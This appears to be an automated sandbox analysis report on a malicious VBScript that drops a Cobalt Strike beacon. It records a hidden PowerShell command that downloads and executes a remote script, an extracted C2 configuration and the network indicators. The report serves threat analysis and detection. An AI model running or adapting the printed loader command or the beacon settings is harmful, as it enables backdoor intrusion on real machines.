| File name: | dma.vbs |
| Full analysis: | https://app.any.run/tasks/4cf88947-699c-4a67-9327-def8cf3b3db2 |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | June 21, 2025, 03:08:23 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (2175), with no line terminators |
| MD5: | 716F6CCB5C9EB53601C280A3769100F3 |
| SHA1: | 514957920A1AFCEF3C6EB4A6F91F7968AFB5518E |
| SHA256: | D33EB73C895BFE3284FD1F6266451DF7844C88EAEA62EF5E86BAF908B00C11CE |
| SSDEEP: | 24:Ii2jLsAcEFx2iZYuCq5O+8Do17j3Nd56oiJzJJ0LaDrkEaEwYVMiIhFJJlAgK2q5:IpKE0uCq5Fso1n507J0z6bqJtK2qUg1 |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 4224)
Bypass execution policy to execute commands
- powershell.exe (PID: 4224)
Changes powershell execution policy (Bypass)
- wscript.exe (PID: 6532)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 4224)
COBALTSTRIKE has been detected (YARA)
- powershell.exe (PID: 4224)
SUSPICIOUS
The process executes Powershell scripts
- wscript.exe (PID: 6532)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 6532)
The process bypasses the loading of PowerShell profile settings
- wscript.exe (PID: 6532)
Runs shell command (SCRIPT)
- wscript.exe (PID: 6532)
Possibly malicious use of IEX has been detected
- wscript.exe (PID: 6532)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 4224)
INFO
Disables trace logs
- powershell.exe (PID: 4224)
Gets data length (POWERSHELL)
- powershell.exe (PID: 4224)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 4224)
Checks proxy server information
- slui.exe (PID: 3780)
- powershell.exe (PID: 4224)
Reads the software policy settings
- slui.exe (PID: 3780)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
CobalStrike
(PID) Process(4224) powershell.exe
C2 (1)185.241.208.247/activity
BeaconTypeHTTPS
Port443
SleepTime60000
MaxGetSize1048576
Jitter0
PublicKey-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDep04s64MxkIJpHnHOz2Afi4Tk
6MhWcyj2S6YxJK4EFUhVU/7HiWZkSBhvdg6UEjgyWuf5x9SX7QVbxmyYxF1Oobkq
tA2gKwSoYtlTyBjdlfEOvATsZofRvbdZgUEew37RsGtNjGR2sEVkpDUCo6oGfSvZ
kvwml5gjvHh0jd0YXQIDAQAB
-----END PUBLIC KEY-----
DNS_strategyround-robin
DNS_strategy_rotate_seconds-1
DNS_strategy_fail_x-1
DNS_strategy_fail_seconds-1
SpawnTo00000000000000000000000000000000
Spawnto_x86%windir%\syswow64\rundll32.exe
Spawnto_x64%windir%\sysnative\rundll32.exe
CryptoScheme0
HttpGet_VerbGET
HttpPost_VerbPOST
HttpPostChunk0
Watermark987654321
bStageCleanupFalse
bCFGCautionFalse
UserAgentMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; MAAU; NP08)
HttpPostUri/submit.php
HttpGet_Metadata
SessionId (2)base64
header: Cookie
HttpPost_Metadata
ConstHeaders (1)Content-Type: application/octet-stream
SessionId (1)parameter: id
Output (1)print
bUsesCookies0001
Proxy_BehaviorUse IE settings
tcpFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
smbFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
KillDate0-0-0
bProcInject_StartRWXTrue
bProcInject_UseRWXTrue
bProcInject_MinAllocSize0
ProcInject_PrependAppend_x86000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000...
ProcInject_PrependAppend_x64000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000...
ProcInject_Stubae5afcfee8026674dc8f3b4f2da46c7f
ProcInject_AllocationMethodVirtualAllocEx
Total processes
137
Monitored processes
4
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 3656 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3780 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4224 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'https://gist.githubusercontent.com/kas-sec/f667237f09f56fd91db154fcc8b8547b/raw/175aa02696dd69713636fb7c5643bdbb6f5009de/demon.ps1' -UseBasicParsing | Invoke-Expression}" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
CobalStrike(PID) Process(4224) powershell.exe C2 (1)185.241.208.247/activity BeaconTypeHTTPS Port443 SleepTime60000 MaxGetSize1048576 Jitter0 PublicKey-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDep04s64MxkIJpHnHOz2Afi4Tk
6MhWcyj2S6YxJK4EFUhVU/7HiWZkSBhvdg6UEjgyWuf5x9SX7QVbxmyYxF1Oobkq
tA2gKwSoYtlTyBjdlfEOvATsZofRvbdZgUEew37RsGtNjGR2sEVkpDUCo6oGfSvZ
kvwml5gjvHh0jd0YXQIDAQAB
-----END PUBLIC KEY----- DNS_strategyround-robin DNS_strategy_rotate_seconds-1 DNS_strategy_fail_x-1 DNS_strategy_fail_seconds-1 SpawnTo00000000000000000000000000000000 Spawnto_x86%windir%\syswow64\rundll32.exe Spawnto_x64%windir%\sysnative\rundll32.exe CryptoScheme0 HttpGet_VerbGET HttpPost_VerbPOST HttpPostChunk0 Watermark987654321 bStageCleanupFalse bCFGCautionFalse UserAgentMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; MAAU; NP08) HttpPostUri/submit.php HttpGet_Metadata SessionId (2)base64 header: Cookie HttpPost_Metadata ConstHeaders (1)Content-Type: application/octet-stream SessionId (1)parameter: id Output (1)print bUsesCookies0001 Proxy_BehaviorUse IE settings tcpFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 smbFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 KillDate0-0-0 bProcInject_StartRWXTrue bProcInject_UseRWXTrue bProcInject_MinAllocSize0 ProcInject_PrependAppend_x86000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000... ProcInject_PrependAppend_x64000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000... ProcInject_Stubae5afcfee8026674dc8f3b4f2da46c7f ProcInject_AllocationMethodVirtualAllocEx | |||||||||||||||
| 6532 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\Desktop\dma.vbs | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
Total events
9 682
Read events
9 679
Write events
3
Delete events
0
Modification events
| (PID) Process: | (4224) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4224) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4224) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4224 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m2xpjljr.klf.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4224 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:F28C0DA237ED1834E4B99B171238870A | SHA256:4455216C68D473BA56A08296EFE472F65CAD0FB891AC124DE05EFE761DAE5CB3 | |||
| 4224 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hfn0h5dx.duu.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
34
TCP/UDP connections
46
DNS requests
21
Threats
10
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.55.104.190:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.55.104.190:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2228 | RUXIMICS.exe | GET | 200 | 23.55.104.190:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2228 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | POST | 200 | 20.190.160.4:443 | https://login.live.com/RST2.srf | unknown | xml | 1.24 Kb | whitelisted |
— | — | GET | 200 | 140.82.121.4:443 | https://gist.githubusercontent.com/kas-sec/f667237f09f56fd91db154fcc8b8547b/raw/175aa02696dd69713636fb7c5643bdbb6f5009de/demon.ps1 | unknown | — | — | — |
— | — | POST | 200 | 20.190.160.2:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | unknown | text | 16.7 Kb | whitelisted |
— | — | GET | 302 | 140.82.121.4:443 | https://github.com/kas-sec/random/releases/download/hoax/cobalt.bin | unknown | — | — | — |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
2228 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.55.104.190:80 | crl.microsoft.com | Akamai International B.V. | US | whitelisted |
1268 | svchost.exe | 23.55.104.190:80 | crl.microsoft.com | Akamai International B.V. | US | whitelisted |
2228 | RUXIMICS.exe | 23.55.104.190:80 | crl.microsoft.com | Akamai International B.V. | US | whitelisted |
5944 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
gist.githubusercontent.com |
| shared |
github.com |
| whitelisted |
objects.githubusercontent.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO PS1 Powershell File Request |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
— | — | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
— | — | Misc activity | ET INFO EXE - Served Attached HTTP |
— | — | Targeted Malicious Activity was Detected | ET MALWARE Cobalt Strike Beacon Observed |
— | — | A Network Trojan was detected | BACKDOOR [ANY.RUN] Possible Cobalt Strike Beacon |
— | — | Targeted Malicious Activity was Detected | ET MALWARE Cobalt Strike Beacon Observed |
— | — | A Network Trojan was detected | BACKDOOR [ANY.RUN] Possible Cobalt Strike Beacon |
— | — | Potentially Bad Traffic | ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |